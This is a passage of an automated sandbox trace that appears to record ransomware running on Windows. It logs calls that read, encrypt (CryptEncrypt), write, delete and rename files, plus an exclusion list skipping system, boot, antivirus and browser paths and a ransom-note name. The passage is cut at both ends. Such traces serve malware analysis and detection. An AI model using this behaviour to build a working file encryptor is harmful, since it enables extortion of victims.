lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.662] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.662] GetLastError () returned 0x0 [0151.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.662] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.662] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0151.662] GetLastError () returned 0x0 [0151.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0151.662] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0151.662] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0151.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui")) returned 0x20 [0151.662] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", dwFileAttributes=0x20) returned 0 [0151.662] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 1 [0151.662] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui")) returned 0 [0151.663] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" [0151.663] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0151.663] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC37C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc37c.tmp")) returned 0xc37c [0151.663] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC37C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc37c.tmp"), dwFlags=0x1) returned 0 [0151.663] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC37C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc37c.tmp")) returned 1 [0151.665] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0151.665] wcslen (_String="OK") returned 0x2 [0151.666] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.666] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.666] CryptDestroyKey (hKey=0x9ad638) returned 1 [0151.666] CryptDestroyHash (hHash=0x9ad738) returned 1 [0151.666] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0151.666] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0151.667] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*NMCRYPT") returned 0 [0151.667] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0151.667] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*.exe") returned 0 [0151.667] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*.dll") returned 0 [0151.667] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*.lnk") returned 0 [0151.667] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*.bat") returned 0 [0151.667] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*.ini") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*.msi") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*.scf") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*AppData*") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\java\\*") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0151.668] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\windows\\*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*Atheros*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*Realtek*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*bootmgr*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*boot*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*boot*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0151.669] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*IO.SYS*") returned 0 [0151.670] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0151.670] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0151.670] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*ntldr*") returned 0 [0151.670] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*chrome*") returned 0 [0151.670] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*opera*") returned 0 [0151.670] PathMatchSpecW (pszFile="IpsMigrationPlugin.dll.mui", pszSpec="*firefox*") returned 0 [0151.670] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", pszSpec="*") returned 1 [0151.670] strlen (_Str="NMoreira") returned 0x8 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.670] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.672] CryptGenRandom (in: 